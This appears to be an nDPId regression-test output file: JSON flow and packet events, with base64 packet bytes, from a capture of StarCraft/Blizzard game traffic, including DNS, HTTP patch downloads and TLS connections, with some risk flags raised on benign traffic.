00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964752,"flow_last_seen":1437389964752,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1437389964752,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1437389964783,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1437389964783,"pkt":"hCYVPnXEIImEa8W6CABFAAA\/X2YAAIARVpXAqAFkwKgB\/up6ADUAK3heAXYBAAABAAAAAAAABGxsbncIYmxpenphcmQDY29tAAABAAE="} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1437389964788,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":144,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":144,"pkt_l4_len":110,"thread_ts_msec":1437389964788,"pkt":"IImEa8W6hCYVPnXECABFAACCAABAAEARtbjAqAH+wKgBZAA16noAbnPyAXaBgAABAAMAAAAABGxsbncIYmxpenphcmQDY29tAAABAAHADAAFAAEAAFQfABcIYmxpenphcmQCdm8FbGxud2QDbmV0AMAvAAEAAQAAATwABFf43f7ALwABAAEAAAE8AARX+N39"} 00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389964752,"flow_last_seen":1437389964788,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1437389964788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"87.248.221.254"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964790,"flow_last_seen":1437389964790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389964790,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1437389964790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964790,"pkt":"hCYVPnXEIImEa8W6CABFAAA0FwlAAIAG67fAqAFkV\/jd\/g20AFApaAewAAAAAIAC\/\/838QAAAgQFtAEDAwgBAQQC"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1437389964848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964848,"pkt":"IImEa8W6hCYVPnXECABFAAA0tGpAAPUG2VVX+N3+wKgBZABQDbTA0NjuKWgHsYAS\/\/+fJQAAAgQFtAEDAwQEAgAA"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1437389964848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389964848,"pkt":"hCYVPnXEIImEa8W6CABFAAAoFwpAAIAG68LAqAFkV\/jd\/g20AFApaAexwNDY71AQBADa8wAA"} -00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964790,"flow_last_seen":1437389964848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1437389964848,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":0,"content_type":"","user_agent":"Blizzard Web Client"}} -01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389964790,"flow_last_seen":1437389964921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1437389964921,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":200,"content_type":"application\/octet-stream","user_agent":"Blizzard Web Client"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389967432,"flow_last_seen":1437389967432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389967432,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1437389967432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389967432,"pkt":"hCYVPnXEIImEa8W6CABFAAA0U2dAAIAG+pjAqAFkDIHeNg24AFDXJA2NAAAAAIACIACvkgAAAgQFtAEDAwgBAQQC"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1437389967630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389967630,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAAC0GoQAMgd42wKgBZABQDbj6JMXG1yQNjoASFtD4xgAAAgQFtAEBBAIBAwMH"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1437389967630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389967630,"pkt":"hCYVPnXEIImEa8W6CABFAAAoU2hAAIAG+qPAqAFkDIHeNg24AFDXJA2O+iTFx1AQAQBPaQAA"} -00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389967432,"flow_last_seen":1437389967639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437389967639,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968486,"flow_last_seen":1437389968486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968486,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1437389968486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968486,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaD9AAIAGnzjAqAFkAuQuaA2kAbvjTIWjXKb5cVARAQDtEwAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEBAAIAGnzfAqAFkAuQuaA2hAbso9r9xF3ZyNlARAP06DgAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEFAAIAGnzbAqAFkAuQuaA2iAbuuMy\/9hNS6Y1ARAQCOtQAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEJAAIAGnzXAqAFkAuQuaA2jAbuWFKpTUfGXQ1ARBFh\/KAAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWNAAIAG7grAqAFkAuQucg2aAbv4rJBdJdjUo1ARAP0omQAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWRAAIAG7gnAqAFkAuQucg2YAbs5x3Vg1+NhTFARAQDDxgAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWVAAIAG7gjAqAFkAuQucg2ZAbvryQjoVlrkVFARAQB8vAAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWZAAIAG7gfAqAFkAuQucg2XAbvNUW978CZu3VARBF0M8QAA"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1437389968487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968487,"pkt":"hCYVPnXEIImEa8W6CABFAAAoPo5AAIAGjnLAqAFkxyaknA2eAbtl4GJo2w7rJVAR9fPuOQAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968488,"flow_last_seen":1437389968488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968488,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1437389968488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968488,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDZAAIAGrOrAqAFkrcJx4A2cAbsxkmlKz83WwVARAP18ZAAA"} -00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdOZFAADkGFKgC5C5ywKgBZAG7DZol2NSj+KyQXlAYAk8nagAAFQMCADAMud3SaYTsSqa\/uoo0a5E8VCc4Xkt3IWOikvjNzbZ6\/KN17SBOZ1wiAn+Wb8fZvA4="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968519,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWdAAIAG7gbAqAFkAuQucg2aAbv4rJBeJdjU2FAUAAApXQAA"} -00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdHrRAADkGL4UC5C5ywKgBZAG7DZfwJm7dzVFvfFAYAvbMYQAAFQMCADAisnLQsHrL1EoW2shNoX67xhkXstAI1yd6wVWuICpme1diCl2In\/GtYthhkjE1BS4="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968519,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWhAAIAG7gXAqAFkAuQucg2XAbvNUW988CZvElAUAAARFQAA"} -00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdZwtAADkG5y0C5C5ywKgBZAG7DZlWWuRU68kI6VAYAk+37QAAFQMCADBkKOWBHzDl37wozuIxUqGksDGbpGilDaRqgrJ95jL33eBT4nQmWu5qzsKHkzuYbBI="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968520,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWlAAIAG7gTAqAFkAuQucg2ZAbvryQjpVlrkiVAUAAB9gwAA"} -00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968520,"pkt":"IImEa8W6hCYVPnXECABFAABdGMVAADkGNX4C5C5owKgBZAG7DaRcpvlx40yFpFAYAi2\/cgAAFQMCADCHvY3Mj+EIqhLZWr7xkOkCQpCu81AAuIN2GL29a+w7fDrgr\/wsC4qtrqrTilg07F0="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968520,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEpAAIAGny3AqAFkAuQuaA2kAbvjTIWkXKb5plAUAADt2gAA"} -00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAABd0ZRAADkGfK4C5C5owKgBZAG7DaKE1LpjrjMv\/lAYAi2OuwAAFQMCADAOk8uVyOotmLX2HoTUFpC+IVWXwl6ab8qQjuO+KPoI4xJC+fUMLiJl2rPTnnO4+D0="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEtAAIAGnyzAqAFkAuQuaA2iAbuuMy\/+hNS6mFAUAACPfAAA"} 